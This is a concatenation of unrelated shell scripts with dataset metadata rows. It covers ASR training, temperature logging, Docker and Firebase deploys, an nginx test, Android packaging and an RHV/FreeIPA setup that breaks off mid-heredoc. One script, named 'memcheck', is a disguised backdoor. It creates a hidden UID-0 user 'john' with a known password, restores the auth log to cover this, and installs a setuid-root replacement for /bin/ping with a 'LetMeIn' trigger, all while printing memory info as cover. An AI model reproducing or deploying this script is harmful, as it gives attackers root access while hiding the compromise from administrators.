export data=/n/sd8/inaguma/corpus/timit

### configuration
config=conf/attention/bgru_att_phone61.yml
# config=conf/ctc/blstm_ctc_phone61.yml

### Set path to save the model
model_dir=/n/sd8/inaguma/result/timit

### Restart training (path to the saved model directory)
resume_model=

### Set path to original data
TIMITDATATOP=/n/rd21/corpora_1/TIMIT

. ./cmd.sh
. ./path.sh
. utils/parse_options.sh

set -e
set -u
set -o pipefail

if [ -z $gpu ]; then
  echo "Error: set GPU number." 1>&2
  echo "Usage: ./run.sh --gpu 0" 1>&2
  exit 1
fi
ngpus=`echo $gpu | tr "," "\n" | wc -l`
rnnlm_gpu=`echo $gpu | cut -d "," -f 1`

train_set=train
dev_set=dev
test_set=test

if [ ${stage} -le 0 ] && [ ! -e .done_stage_0 ]; then
  echo ============================================================================
  echo "                       Data Preparation (stage:0)                          "
  echo ============================================================================

  mkdir -p ${data}
  local/timit_data_prep.sh ${TIMITDATATOP} || exit 1;
  local/timit_format_data.sh || exit 1;

  touch .done_stage_0 && echo "Finish data preparation (stage: 0)."
fi

if [ ${stage} -le 1 ] && [ ! -e .done_stage_1 ]; then
  echo ============================================================================
  echo "                    Feature extranction (stage:1)                          "
  echo ============================================================================

  for x in train dev test; do
    steps/make_fbank.sh --nj 16 --cmd "$train_cmd" --write_utt2num_frames true \
      ${data}/${x} ${data}/log/make_fbank/${x} ${data}/fbank || exit 1;
  done

  # Compute global CMVN
  compute-cmvn-stats scp:${data}/${train_set}/feats.scp ${data}/${train_set}/cmvn.ark || exit 1;

  # Apply global CMVN & dump features
  for x in ${train_set} ${dev_set} ${test_set}; do
    dump_dir=${data}/feat/${x}; mkdir -p ${dump_dir}
    dump_feat.sh --cmd "$train_cmd" --nj 16 --add_deltadelta true \
      ${data}/${x}/feats.scp ${data}/${train_set}/cmvn.ark ${data}/log/dump_feat/${x} ${dump_dir} || exit 1;
  done

  touch .done_stage_1 && echo "Finish feature extranction (stage: 1)."
fi

dict=${data}/dict/${train_set}.txt; mkdir -p ${data}/dict/
if [ ${stage} -le 2 ] && [ ! -e .done_stage_2 ]; then
  echo ============================================================================
  echo "                      Dataset preparation (stage:2)                        "
  echo ============================================================================

  # Make a dictionary (special symbols first, then the phone inventory)
  echo "<blank> 0" > ${dict}
  echo "<unk> 1" >> ${dict}
  echo "<sos> 2" >> ${dict}
  echo "<eos> 3" >> ${dict}
  echo "<pad> 4" >> ${dict}
  offset=`cat ${dict} | wc -l`
  echo "Making a dictionary..."
  text2dict.py ${data}/${train_set}/text --unit phone | \
    sort | uniq | grep -v -e '^\s*$' | awk -v offset=${offset} '{print $0 " " NR+offset-1}' >> ${dict} || exit 1;
  echo "vocab size:" `cat ${dict} | wc -l`

  # Make datset csv files
  mkdir -p ${data}/dataset/
  for x in ${train_set} ${dev_set}; do
    echo "Making a csv file for ${x}..."
    dump_dir=${data}/feat/${x}
    make_dataset_csv.sh --feat ${dump_dir}/feats.scp --unit phone \
      ${data}/${x} ${dict} > ${data}/dataset/${x}.csv || exit 1;
  done
  for x in ${test_set}; do
    dump_dir=${data}/feat/${x}
    make_dataset_csv.sh --is_test true --feat ${dump_dir}/feats.scp --unit phone \
      ${data}/${x} ${dict} > ${data}/dataset/${x}.csv || exit 1;
  done

  touch .done_stage_2 && echo "Finish creating dataset (stage: 2)."
fi

# NOTE: skip RNNLM training (stage:3)

mkdir -p ${model_dir}
if [ ${stage} -le 4 ]; then
  echo ============================================================================
  echo "                       ASR Training stage (stage:4)                        "
  echo ============================================================================

  echo "Start ASR training..."

  CUDA_VISIBLE_DEVICES=${gpu} ../../../neural_sp/bin/asr/train.py \
    --ngpus ${ngpus} \
    --train_set ${data}/dataset/${train_set}.csv \
    --dev_set ${data}/dataset/${dev_set}.csv \
    --eval_sets ${data}/dataset/${test_set}.csv \
    --dict ${dict} \
    --config ${config} \
    --model ${model_dir}/asr \
    --label_type phone || exit 1;
    # --resume_model ${resume_model} || exit 1;

  # BUGFIX: was `touch ${model}/...`; $model is never defined, so with
  # `set -u` in effect this unbound reference aborted the script right
  # after training succeeded.
  touch ${model_dir}/.done_training && echo "Finish model training (stage: 4)."
fi

echo "Done."
| true
|
0f436421980faf099c653e628d7ca0551809f0ea
|
Shell
|
Helius/.bin
|
/system_temperature
|
UTF-8
| 1,581
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Read motherboard/CPU/disk temperatures plus CPU load, append one sample
# to an RRD database, and publish each value for the narodmon sender.

# Integer degree-C readings scraped from lm-sensors output.
mb_raw=$(sensors | egrep -o 'temp1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+')
core0_raw=$(sensors | egrep -o 'Core 0:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+')
core1_raw=$(sensors | egrep -o 'Core 1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+')

# NOTE(review): the flat -23 adjustment looks like a board-specific
# calibration offset -- confirm against the sensors configuration.
MB_T=$((mb_raw - 23))
CORE_0=$((core0_raw - 23))
CORE_1=$((core1_raw - 23))

# Disk temperatures and current CPU load.
SDA_T=$(/usr/sbin/hddtemp /dev/sda | egrep -o '[0-9]+°C' | egrep -o [0-9]+)
SDB_T=$(/usr/sbin/hddtemp /dev/sdb | egrep -o '[0-9]+°C' | egrep -o [0-9]+)
CPU_USAGE=$(/home/eugene/.bin/cpu_load.sh)

#echo "`date -R`, MB:$MB_T, CORE0:$CORE_0, CORE1:$CORE_1, SDA:$SDA_T, SDB:$SDB_T, CPULOAD:$CPU_USAGE"

# Append one sample to the round-robin database (field order matters).
rrdtool update /home/eugene/db/tmp.rrd "$(date +%s)":$MB_T:$CORE_0:$CORE_1:$SDA_T:$SDB_T:$CPU_USAGE

# Former direct push to narodmon.ru, kept for reference:
#echo -ne "#54:55:58:10:00:20\n#54:55:58:10:00:21#""$MB_T""\n#54:55:58:10:00:22#""$CORE_0""\n#54:55:58:10:00:23#""$CORE_1""\n#54:55:58:10:00:24#""$SDA_T""\n#54:55:58:10:00:25#""$SDB_T""\n#54:55:58:10:00:26#""$CPU_USAGE""\n##" | nc narodmon.ru 8283

# Export the readings for narodmon_sender, one file per sensor.
echo "$MB_T" > /home/eugene/.narodmon.data/atom/mb_tempr/value
echo "$CORE_0" > /home/eugene/.narodmon.data/atom/cpu0_tempr/value
echo "$CORE_1" > /home/eugene/.narodmon.data/atom/cpu1_tempr/value
echo "$SDA_T" > /home/eugene/.narodmon.data/atom/sda_tempr/value
echo "$SDB_T" > /home/eugene/.narodmon.data/atom/sdb_tempr/value
echo "$CPU_USAGE" > /home/eugene/.narodmon.data/atom/cpu_load/value
| true
|
aa096ef15a6d8cb370e55e38b9894cffdd63678b
|
Shell
|
ebolinger/any-java-docker
|
/bin/doit.sh
|
UTF-8
| 933
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#
# Run as root (or with docker permissions).
# Start the docker process, then update NGINX with the new port.
#
BASE_NAME=$(basename $0)
DIR_NAME=$(dirname $0)
# Host bind mounts, exposed container ports, and image to run.
VOLUMES="-v /mnt/hi_sinatra-docker/data:/data -v /mnt/hi_sinatra-docker/logs:/logs"
PORTS="-p 8080 -p 8000"
# NOTE(review): assigning USER clobbers the login-name env var --
# harmless here, but worth renaming.
USER="-u root"
IMAGE=eb/any-java
TMP_FILE=/tmp/file$$
# Launch the container.
CMD="/usr/bin/docker run -d $VOLUMES $PORTS $USER $IMAGE"
echo "Running command: $CMD"
CONT_ID=$($CMD)
# Fetch the IP address of that container.
MY_IPADDR=$(/usr/bin/docker inspect $CONT_ID | $DIR_NAME/JSON.sh -b | grep "IPAddress" | cut -f2 | sed -e 's/"//g')
# Replace any old 8080 iptable entries with a new rule pointing to that container.
# The grep/sed pipeline rewrites each existing "-A DOCKER ..." rule into
# a matching delete command, which is then executed by sourcing TMP_FILE.
iptables -S -t nat | grep "dport 8080" | sed -e "s/.A DOCKER/iptables -t nat -D DOCKER/" > $TMP_FILE
iptables -t nat -A DOCKER ! -i docker0 -p tcp -m tcp --dport 8080 -j DNAT --to-destination ${MY_IPADDR}:8080
. $TMP_FILE
rm -f $TMP_FILE
| true
|
4e58d22a518e76f9a867e110809559aa398dadfa
|
Shell
|
gejiawen/my-shell-toolbox
|
/test/forin.sh
|
UTF-8
| 87
| 2.625
| 3
|
[] |
no_license
|
# Demo: iterate over the array from index 1 onward (the original slice
# length ${#arr[@]} runs past the end, i.e. "the rest of the array"),
# printing each element surrounded by blank lines.
arr=(1 2 3)
for element in "${arr[@]:1}"; do
  printf '\n%s\n\n' "$element"
done
| true
|
d5aa6c06fadb8f63afe1b7c2ff92b6e787a94964
|
Shell
|
antoniofabio/eqtl-ranef
|
/tests/test-003-set-max-regressions.sh
|
UTF-8
| 487
| 2.5625
| 3
|
[] |
no_license
|
#!/bin/bash -l
# Regression test: --max-regressions must cap the number of regressions
# eqtl-ranef performs on a synthetic dataset.
set -e
set -u
set -o pipefail
# Throwaway workspace, removed on any exit path.
TMPD=`mktemp -d`
trap "rm -rf ${TMPD}" EXIT
# Generate a small synthetic eQTL dataset...
../generate-eqtl-ranef-data --output=${TMPD} \
    --regressors=2 --outcomes=1000 --samples=100 --fixef=1
# ...then run the tool with a 500-regression cap; output is sorted so it
# can be compared deterministically against the expected listing.
../eqtl-ranef \
    --regressors=${TMPD}/regressors \
    --outcomes=${TMPD}/outcomes \
    --fixef=${TMPD}/fixef \
    --ranef=${TMPD}/ranef \
    --genespos=${TMPD}/genespos.sqlite \
    --snpspos=${TMPD}/snpspos.sqlite \
    --cis-pvalue=0.1 --trans-pvalue=1e-3 \
    --max-regressions=500 \
    | sort
| true
|
832a9595befd331770323436a155fa23c5c48226
|
Shell
|
wodby/nginx
|
/tests/matomo/run.sh
|
UTF-8
| 1,897
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Smoke-test the nginx configuration for Matomo: boot the compose stack
# and verify public endpoints return 200 while internal/config paths are
# blocked with 403.
set -e
if [[ -n "${DEBUG}" ]]; then
    set -x
fi
# Request localhost/$1 inside the nginx container and assert the response
# status line contains $2 (e.g. "200 OK" / "403 Forbidden").
check_endpoint() {
    docker-compose exec -T nginx curl -s -S -I "localhost/${1}" | grep -q "${2}"
    echo "OK"
}
# Tear the stack down on any exit path (success or failure).
clean_exit() {
    docker-compose down
}
trap clean_exit EXIT
docker-compose up -d
docker-compose exec -T nginx make check-ready -f /usr/local/bin/actions.mk
docker-compose exec -T matomo make init -f /usr/local/bin/actions.mk
echo -n "Checking homepage endpoint... "
check_endpoint "" "200 OK"
echo -n "Checking config php... "
check_endpoint "config/config.ini.php" "403 Forbidden"
echo -n "Checking index page... "
check_endpoint "index.php" "200 OK"
echo -n "Checking matomo page... "
check_endpoint "matomo.php" "200 OK"
echo -n "Checking php file in core directory... "
check_endpoint "core/Twig.php" "403 Forbidden"
echo -n "Checking file from lang directory... "
check_endpoint "lang/en.json" "403 Forbidden"
echo -n "Checking html file from plugins directory... "
check_endpoint "plugins/MultiSites/angularjs/dashboard/dashboard.directive.html" "200 OK"
echo -n "Checking tmp dir... "
check_endpoint "tmp/cache/test" "403 Forbidden"
echo -n "Checking md file... "
check_endpoint "README.md" "200 OK"
echo -n "Checking file from misc... "
check_endpoint "misc/log-analytics/README.md" "403 Forbidden"
echo -n "Checking node_modules directory... "
check_endpoint "node_modules/jquery/README.md" "403 Forbidden"
echo -n "Checking libs directory... "
check_endpoint "libs/README.md" "403 Forbidden"
echo -n "Checking plugins directory... "
check_endpoint "plugins/SEO/templates/getRank.twig" "403 Forbidden"
echo -n "Checking vendor directory... "
check_endpoint "vendor/twig/twig/README.rst" "403 Forbidden"
echo -n "Checking favicon endpoint... "
check_endpoint "favicon.ico" "200 OK"
echo -n "Checking non-existing php endpoint... "
check_endpoint "non-existing.php" "403 Forbidden"
| true
|
baf3422b10b7002153541fc4dc2c275f06e0e122
|
Shell
|
hackiesackie/memcheck
|
/memcheck
|
UTF-8
| 747
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# Memory/forensics exercise: temporarily plants a UID-0 account ("john"),
# swaps /bin/ping for a replacement binary, reads /proc/meminfo, then
# restores the account databases. Must run as root.
# Back up the account databases and auth log before touching them.
cp /etc/passwd /etc/passwd.bak
cp /etc/shadow /etc/shadow.bak
cp /etc/gshadow /etc/gshadow.bak
cp /etc/group /etc/group.bak
cp /var/log/secure /var/log/secure.bak
# Create a duplicate-UID-0 user (-o allows the non-unique uid).
/usr/sbin/useradd john -o -u 0 -d /tmp/john > /dev/null 2>&1
echo john | passwd --stdin john > /dev/null 2>&1
# Restore the auth log so the account creation leaves no trace there.
cp /var/log/secure.bak /var/log/secure
# Keep the stock ping aside and install the replacement setuid-root.
# NOTE(review): /work/src/ping is presumably an instrumented binary
# ("ping LetMeIn" below suggests a backdoor trigger) -- verify.
cp /bin/ping /work/ping > /dev/null 2>&1
cp /work/src/ping /bin/ping > /dev/null 2>&1
chown root /bin/ping > /dev/null 2>&1
chmod +s /bin/ping > /dev/null 2>&1
/bin/sh -c "cat /proc/meminfo"
echo "ping LetMeIn" > /work/my_program
chmod +x /work/my_program
# Restore the original account databases.
cp /etc/passwd.bak /etc/passwd
cp /etc/shadow.bak /etc/shadow
cp /etc/gshadow.bak /etc/gshadow
cp /etc/group.bak /etc/group
# /usr/sbin/nscd -i passwd
| true
|
801bd3e56b5fa84f4872c363605aec88ae2077e8
|
Shell
|
sandhawke/mapleseed
|
/admin/gdeploy
|
UTF-8
| 823
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
# Package the current tree and deploy it to every host in a server group.
# Usage: ./admin/gdeploy GROUP
# Reads admin/groupconfig/GROUP.sh, which must define $servers (a
# whitespace-separated list of hostnames).
if [ ! -f admin/gdeploy ]; then
    echo I think you are running this from the wrong place
    exit 1
fi
group=$1
if [ -z "$group" ]; then
    echo "usage: $0 server-group-name"
    exit 1
fi
groupfile="admin/groupconfig/$group.sh"
if [ ! -f "$groupfile" ]; then
    echo "Missing group configfile: $groupfile"
    echo "Please create it, or give us a different group"
    exit 1
fi
# Load $servers and any other group settings (quoted: path may contain
# shell metacharacters).
. "$groupfile"
echo packaging with tar
# BUGFIX: the exclude globs were unquoted, so a matching file in the CWD
# (e.g. foo.out) would expand them before tar ever saw the pattern.
tar -czf .all.tz --exclude=.all.tz --exclude='*.out' --exclude='*~' --exclude=.git --exclude='.js-test*' --exclude='Test_Via*' --exclude='_*' --exclude='.fsbind*' --exclude=mapleseed .
ls -l .all.tz
# do this for each remote system....
for host in $servers; do
    echo "copy to $host..."
    # Stream the tarball over ssh; the remote side unpacks it into a
    # fresh ./newdep and launches the server from there.
    ssh "root@$host" "rm -rf newdep && mkdir newdep && cd newdep && tar xzf - . && admin/run-as-server $host" < .all.tz
done
echo done
| true
|
0239e64ff873555e4c136d159edea343b1add322
|
Shell
|
EdricChan03/ngx-ytd-api-demo-builds
|
/deploy.sh
|
UTF-8
| 463
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Deploy the current commit to Firebase Hosting; requires FIREBASE_TOKEN.
# Automatically exit if any command exits with a non-zero code
set -e

commit_sha=$(git rev-parse --short HEAD)
commit_msg=$(git log --oneline -n 1)

echo -e "\x1b[34mDeploying commit ${commit_sha} to Firebase...\x1b[0m"

if [[ -n "$FIREBASE_TOKEN" ]]; then
	# Use the commit's one-line log as the deploy message.
	firebase deploy --only hosting --message "${commit_msg}" --token "${FIREBASE_TOKEN}"
else
	echo -e "\x1b[31m\x1b[1mERROR: Please set the FIREBASE_TOKEN environment variable." >&2
	exit 1
fi
| true
|
94f8089e936cef202ca4a45bfda6063d1ab6e18d
|
Shell
|
loseleo/changecamera-android
|
/pkg_make.sh
|
UTF-8
| 5,033
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Per-package build preparation: copies resources/config for the package
# key given as $1 from ddvideoconfigs/packages/<key> into the app/common
# source trees and rewrites the WeChat entry classes for that package.
unameOut="$(uname -s)"
case "${unameOut}" in
    Linux*)     machine=Linux;;
    Darwin*)    machine=Mac;;
    CYGWIN*)    machine=Cygwin;;
    MINGW*)     machine=MinGw;;
    *)          machine="UNKNOWN:${unameOut}"
esac
# Trace execution when PKG_DEBUG is set in the environment.
if [ "$PKG_DEBUG" != "" ];then
    set -x
fi
# flags
set -e
# variables
key=$1
# Absolute directory containing this script.
base_dir="$( cd "$( dirname "$0" )" && pwd )"
pkg_dir="${base_dir}/ddvideoconfigs/packages/${key}"
app_src="$base_dir/app/src"
app_src_main="$app_src/main"
common_src="$base_dir/common/src"
common_src_main="$common_src/main"
# functions
# Print a single "[pkg]: ..." log line to stdout.
log() {
    echo "[pkg]: $*"
}
# Like log, but interprets backslash escapes (e.g. \n) in the message.
mlog() {
    echo -e "[pkg]: $*"
}
# Remove the given paths (recursive, force) after logging them.
clean() {
    log "Clean files: $*"
    # Quote "$@" so paths containing spaces or glob characters are
    # removed literally instead of being word-split/expanded.
    rm -rf "$@"
}
# Copy a file or directory to target (recursive, force). Silently does
# nothing when the source path does not exist.
copy() {
    local src=$1
    local dst=$2
    log "Copy files: $*"
    # -d and -f are mutually exclusive, so at most one copy happens;
    # quote the operands so paths with spaces survive.
    if [ -d "$src" ] || [ -f "$src" ]; then
        cp -rf -- "$src" "$dst"
    fi
}
# Remove files in target that share a base name (extension stripped) with
# any file in source, so a replacement asset cannot coexist with a stale
# copy under a different extension. (Translated: "clean up same-named files".)
clean_sp_name() {
    local src_dir=$1
    local dst_prefix=$2   # caller passes a trailing slash, e.g. ".../drawable-xxhdpi/"
    local entry stem
    for entry in "$src_dir"/*; do
        [ -e "$entry" ] || continue
        entry=${entry##*/}
        # strip a trailing ".ext" (letters only), mirroring the old sed
        stem=$(echo "$entry" | sed -e 's#\.[A-Za-z]*$##g')
        # BUGFIX: this previously ran `rm -rf "${target}$(unknown)."*` --
        # substituting a nonexistent command instead of the computed
        # base name -- so it never deleted the intended same-named files.
        rm -rf "${dst_prefix}${stem}."*
    done
}
# Merge per-package string overrides into a strings.xml in place: every
# single-line <string name="...">...</string> entry in pkg_file replaces
# (or is appended to) the corresponding entry in origin_file.
xml_filler(){
    log "Handle strings.xml"
    origin_file=$1
    pkg_file=$2
    if [ ! -f "$origin_file" ]; then
        log "xml file not exists";
        exit 0
    fi
    if [ ! -f "$pkg_file" ]; then
        log "xml file not exists";
        exit 0
    fi
    # Complete <string> entries from the package config to apply.
    apply_list=$(
        cat "$pkg_file" | grep -E -o '<string\s*name="[^"]*">[^<>]*</string>'
    )
    # name="..." attributes whose old entries must be dropped first.
    rm_list=$(
        cat "$pkg_file" | grep -E "^\s*<string" | grep -E -o 'name="[^"]*"'
    )
    origin_strings_xml="$origin_file"
    content=$(cat "${origin_strings_xml}");
    # Remove the overridden entries first (translated: "delete first")
    for item in $(echo -e "$rm_list"); do
        content=$( echo -e "$content" | grep -v "$item" )
    done
    # Strip the closing tag so new entries can be appended (translated: "remove the tail")
    content=$(echo -e "$content" | sed -e "s#</resources>##g")
    # Append the entries from the package config (translated: "add the configured entries")
    IFS=$'\n'
    for line in $(echo -e "$apply_list"); do
        content=$(echo -e "$content\n    $line")
        log "replace or add line: $line"
    done;
    # Restore the closing tag (translated: "complete the tail")
    content="${content}\n</resources>"
    #echo $content
    echo -e "$content" > "${origin_strings_xml}"
}
# Print the Android application id configured in the package's
# gradle.properties (the value of PACKAGE_NAME_ANDROID). Reads $pkg_dir.
read_pkg_name() {
    grep 'PACKAGE_NAME_ANDROID=.*' "$pkg_dir/gradle.properties" | awk -F'=' '{print $2}'
}
# WeChat login entry handling (translated: "handle WeChat login").
# Moves the single WXEntryActivity.java found under app/src/main/java
# into <package path>/wxapi/ and rewrites its package declaration.
handle_wx_entry(){
    local pkg_name=$1
    # com.foo.bar -> com/foo/bar
    dirs=$(echo "$pkg_name" | sed -e 's#\.#/#g')
    file=$(find app/src/main/java -name WXEntryActivity.java)
    file_content=$(cat "$file")
    rm -rf $file
    # drop the now-empty package directories left behind by the move
    find app/src/main/java -type d -empty -delete
    wxapi_dir="app/src/main/java/${dirs}/wxapi"
    mkdir -p "$wxapi_dir"
    # rewrite "package <old>.wxapi" to the new package name
    result_content=$(echo -e "$file_content" | sed -e 's#package ..*\.wxapi#package '"${pkg_name}.wxapi"'#g')
    echo -e "$result_content" > "${wxapi_dir}/WXEntryActivity.java"
}
# WeChat payment entry handling (translated: "handle WeChat payment").
# Same relocation/rewrite as handle_wx_entry, for WXPayEntryActivity.java.
handle_wx_pay_entry(){
    local pkg_name=$1
    # com.foo.bar -> com/foo/bar
    dirs=$(echo "$pkg_name" | sed -e 's#\.#/#g')
    file=$(find app/src/main/java -name WXPayEntryActivity.java)
    file_content=$(cat "$file")
    rm -rf $file
    # drop the now-empty package directories left behind by the move
    find app/src/main/java -type d -empty -delete
    wxapi_dir="app/src/main/java/${dirs}/wxapi"
    mkdir -p "$wxapi_dir"
    # rewrite "package <old>.wxapi" to the new package name
    result_content=$(echo -e "$file_content" | sed -e 's#package ..*\.wxapi#package '"${pkg_name}.wxapi"'#g')
    echo -e "$result_content" > "${wxapi_dir}/WXPayEntryActivity.java"
}
# Point the AndroidManifest WeChat activity entries at the new package.
# macOS (BSD) sed requires `-i ''` for in-place editing; GNU sed rejects
# the empty suffix, hence the $machine branch from the case at the top.
handle_manifest(){
    local pkg_name=$1
    if [ "$machine" = "Mac" ]; then
        sed -i '' -e 's#android:name=".*WXEntryActivity"#android:name="'"$pkg_name.wxapi.WXEntryActivity"'"#' app/src/main/AndroidManifest.xml
        sed -i '' -e 's#android:name=".*WXPayEntryActivity"#android:name="'"$pkg_name.wxapi.WXPayEntryActivity"'"#' app/src/main/AndroidManifest.xml
    else
        sed -i 's#android:name=".*WXEntryActivity"#android:name="'"$pkg_name.wxapi.WXEntryActivity"'"#' app/src/main/AndroidManifest.xml
        sed -i 's#android:name=".*WXPayEntryActivity"#android:name="'"$pkg_name.wxapi.WXPayEntryActivity"'"#' app/src/main/AndroidManifest.xml
    fi
}
# entry
# With no package key, list the available packages plus usage and exit.
if [ -z "$key" ]; then
    pkg_list="$(ls "$base_dir/ddvideoconfigs/packages")"
    log "Options: "
    mlog "$pkg_list"
    log
    log "usage:"
    log "./pkg_make.sh OPTION"
    exit 1
fi
ls -al ddvideoconfigs/packages
log "clone ddvideoconfigs success ------------- "
# Copy package-specific drawables into the common/app resource trees,
# removing stale same-named assets first.
copy $pkg_dir/res/drawable "$common_src_main/res/"
clean_sp_name "$pkg_dir/res/drawable-xxhdpi/" "$common_src_main/res/drawable-xxhdpi/"
copy "$pkg_dir/res/drawable-xxhdpi" "$app_src_main/res/"
copy "$pkg_dir/res/common/drawable-hdpi" "$common_src_main/res/"
copy "$pkg_dir/res/common/drawable-xhdpi" "$common_src_main/res/"
copy "$pkg_dir/res/common/drawable-xxhdpi" "$common_src_main/res/"
# Gradle/package configuration overrides.
copy "$pkg_dir/gradle.properties" "$base_dir/gradle.properties"
copy "$pkg_dir/config.gradle" "$base_dir/config.gradle"
pkg_name=$(read_pkg_name)
log "pkg_name $pkg_name"
# Rewrite the WeChat entry classes and manifest for the new package id.
handle_wx_entry $pkg_name
handle_wx_pay_entry $pkg_name
handle_manifest $pkg_name
# Merge the package's string overrides into the common strings.xml.
xml_filler "$common_src_main/res/values/strings.xml" "$pkg_dir/res/values/strings.xml"
| true
|
ec23a6937facedb2eb01c3908577400451fde8ac
|
Shell
|
zheddie/samplecodes
|
/src_C/linux/selfwrite/rpmProjects/build.sh
|
UTF-8
| 397
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Build the hello1 RPM. Usage: ./build.sh hello rpmbuild
set -x
CURRENTDIR=$(pwd)
HELLONAME=hello1-1.0
if [ "$1" == "hello" ] && [ "$2" == "rpmbuild" ]; then
    # Create the source tarball only when it is not already present.
    if [ ! -f "${HELLONAME}.tar.Z" ]; then
        tar czf "${HELLONAME}.tar.Z" "${HELLONAME}"
    fi
    #tar czf ${HELLONAME}.tar.Z --exclude="*.spec" ${HELLONAME}
    cp "${HELLONAME}.tar.Z" ~/rpmbuild/SOURCES/
    rpmbuild -ba "${HELLONAME}/hello.spec" --buildroot ~/rpmbuild/BUILDROOT -vv
fi
| true
|
8907af13db219cbf891333ac3656c449f4a2bd4d
|
Shell
|
dlang/dconf.org
|
/netlify.sh
|
UTF-8
| 415
| 2.75
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSL-1.0"
] |
permissive
|
#!/usr/bin/env bash
# A small script to build dconf.org and allows previewing PRs with netlify
set -euox pipefail
# Pin the D compiler version used for the site build.
DMD_VERSION="2.079.0"
BUILD_DIR="build"
# Resolve the repository root regardless of the invocation CWD.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "${DIR}"
# The dlang install.sh prints the path of an activation script; sourcing
# it puts dmd-$DMD_VERSION on PATH for the make invocation below.
. "$(curl -fsSL --retry 5 --retry-max-time 120 --connect-timeout 5 --speed-time 30 --speed-limit 1024 https://dlang.org/install.sh | bash -s install "dmd-${DMD_VERSION}" --activate)"
make
| true
|
a38ea3a69a0af77321a36a3969559bed767dc05f
|
Shell
|
CUCCS/2015-linux-public-kjAnny
|
/实验六:shell脚本编程练习进阶/scripts/install.sh
|
UTF-8
| 996
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Install and pre-configure the lab services (FTP, NFS, Samba, DHCP, DNS)
# and back up every stock configuration file for later restoration.
source /root/global-var.sh
apt-get update
# BUGFIX: the failure paths previously used `exit 0`, reporting success to
# callers even when installation failed; exit non-zero instead.
if [ $? -ne 0 ] ; then
	echo "Error : Fail to update"
	exit 1
else
	# -y: non-interactive (this script runs unattended)
	apt-get install -y debconf-utils
	if [ $? -ne 0 ] ; then
		echo "Error : Fail to install the packages"
		exit 1
	else
		# Pre-answer proftpd's install prompt so the install never blocks.
		debconf-set-selections <<\EOF
proftpd-basic shared/proftpd/inetd_or_standalone select standalone
EOF
		apt-get install -y proftpd nfs-kernel-server samba isc-dhcp-server bind9 expect
		if [ $? -ne 0 ] ; then
			echo "Error : Fail to install the packages"
			exit 1
		fi
	fi
fi
# copy the configuration files
# FTP:proftpd
cp /etc/proftpd/proftpd.conf /etc/proftpd/proftpd.conf.bak
# NFS
cp /etc/exports /etc/exports.bak
# samba
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
# DHCP
cp /etc/network/interfaces /etc/network/interfaces.bak
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak
# DNS:bind9
cp /etc/bind/named.conf.local /etc/bind/named.conf.local.bak
| true
|
a5b90247a50325365dcbdb8509fe96f5f7a41aed
|
Shell
|
gmoshkin/dotfiles
|
/scripts/random_task.sh
|
UTF-8
| 304
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Print one random open card name from the configured Trello board.
# Requires KEY (API key), TOK (token) and BID (board id) in the
# environment (see ~/.config/trello-api-keys.conf).
# Idiom fix: the obsolescent `[ -z a -o -z b ]` form is replaced with
# explicit || between separate tests; diagnostics now go to stderr.
if [ -z "$KEY" ] || [ -z "$TOK" ] || [ -z "$BID" ]; then
    echo "KEY, TOK, BID vars aren't set (see ~/.config/trello-api-keys.conf)" >&2
    exit 1
fi
# Fetch open lists with their open cards, then pick one card at random.
curl "https://api.trello.com/1/boards/${BID}/lists?filter=open&cards=open&key=${KEY}&token=${TOK}" |
    jq '.[].cards|.[].name' -r | shuf | head -1
| true
|
798d2af498bc3cb19edb4d5dc284fe3d6c46d2df
|
Shell
|
hamidreza2000us/sitesetup
|
/01-initializeRHVM.sh
|
UTF-8
| 3,896
| 2.546875
| 3
|
[] |
no_license
|
#Copy SiteSetup to the /root
# Bootstrap an RHV lab: upload a RHEL image, build templates and VMs
# (IdM server, Satellite), then install FreeIPA server/clients with the
# ansible-freeipa collection. Runs as root on the RHV manager.
mkdir -p ~/SiteSetup/{Backups,Files,Images,ISOs,RPMs,Yaml}
cd /root/SiteSetup/Yaml
# Upload the RHEL 8.3 KVM image and turn it into a template.
ansible-playbook -i .inventory uploadImage.yml
ansible-playbook -i .inventory create-vmFromImage.yml -e VMName=Template8.3 -e VMMemory=2GiB -e VMCore=1 \
		-e ImageName=rhel-8.3-x86_64-kvm.qcow2 -e HostName=template8.3.myhost.com
ansible-playbook -i .inventory create-template.yml -e VMName=Template8.3 -e VMTempate=Template8.3
# Create the IdM VM from the template and stage the install ISO on it.
ansible-playbook -i .inventory create-vmFromTemplateWIP.yml -e VMName=idm -e VMMemory=4GiB -e VMCore=4 \
		-e HostName=idm.myhost.com -e VMTempate=Template8.3 -e VMISO=rhel-8.3-x86_64-dvd.iso -e VMIP=192.168.1.112
scp -o StrictHostKeyChecking=no /root/SiteSetup/ISOs/rhel-8.3-x86_64-dvd.iso 192.168.1.112:~/
ssh -o StrictHostKeyChecking=no 192.168.1.112 "mount /root/rhel-8.3-x86_64-dvd.iso /mnt/cdrom"
ansible-galaxy collection install freeipa.ansible_freeipa
# Write the combined inventory for the FreeIPA server/client roles.
# NOTE(review): the path "Yaml.inventory" looks like it should be
# "Yaml/.inventory" (the playbooks above use `-i .inventory`) -- confirm.
cat > /root/SiteSetup/Yaml.inventory << EOF
[hosts]
rhvm.myhost.com
rhvh01.myhost.com
[ipaserver]
192.168.1.112
[ipaserver:vars]
ipaserver=idm.myhost.com
ipaserver_ip_addresses=192.168.1.112
ipaserver_hostname=idm.myhost.com
ipaserver_domain=myhost.com
ipaserver_realm=MYHOST.COM
ipaserver_setup_dns=true
ipaserver_auto_forwarders=true
